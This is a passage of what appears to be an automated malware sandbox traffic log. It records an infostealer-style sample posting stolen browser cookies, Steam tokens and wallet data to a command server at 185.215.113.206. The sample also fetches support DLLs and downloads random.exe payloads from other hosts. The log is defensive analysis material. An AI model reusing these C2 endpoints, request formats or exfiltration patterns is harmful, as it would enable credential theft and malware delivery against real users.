6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 2d 2d 0d 0a Data Ascii: ------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="message"plugins------BKECFIIEHCFHIECAFBAK--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="message"fplugins------FBKFCFBFIDGCGDHJDBKF--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFCHost: 185.215.113.206Content-Length: 6323Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------HIIIDAKKJJJKKECAKKJE--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 2d 2d 0d 0a Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="file"------KJJJKFIIIJJJECAAEHDB--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file"------IIIECAAKECFHIECBKJDH--
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="message"wallets------CGDGCFBAEGDHJKEBGCBA--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="message"files------GHIDGDHCGCBAKFHIIIII--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EHDHDHIECGCAEBFIIDHIContent-Disposition: form-data; name="file"------EHDHDHIECGCAEBFIIDHI--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEHJJECAEGCAAAAEGIEHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 2d 2d 0d 0a Data Ascii: ------DAEHJJECAEGCAAAAEGIEContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------DAEHJJECAEGCAAAAEGIEContent-Disposition: form-data; name="message"ybncbhylepme------DAEHJJECAEGCAAAAEGIE--
                          Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDHIEHJEBAAFIDHJEBGI--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: GET /files/rhnew.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 32 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012278001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 32 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012279001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 32 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012280001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 32 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012281001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAECGIEBKKFHIDAKECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 41 45 43 47 49 45 42 4b 4b 46 48 49 44 41 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 39 41 39 41 43 42 37 32 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 43 47 49 45 42 4b 4b 46 48 49 44 41 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 43 47 49 45 42 4b 4b 46 48 49 44 41 4b 45 43 2d 2d 0d 0a Data Ascii: ------FCBAECGIEBKKFHIDAKECContent-Disposition: form-data; name="hwid"AA9A9ACB72684217651120------FCBAECGIEBKKFHIDAKECContent-Disposition: form-data; name="build"drum------FCBAECGIEBKKFHIDAKEC--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 32 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012282001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 32 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012283001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 39 41 39 41 43 42 37 32 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 2d 2d 0d 0a Data Ascii: ------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="hwid"AA9A9ACB72684217651120------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="build"drum------JKJKKKJJJKJKFHJJJJEC--
                          Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 39 41 39 41 43 42 37 32 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 2d 2d 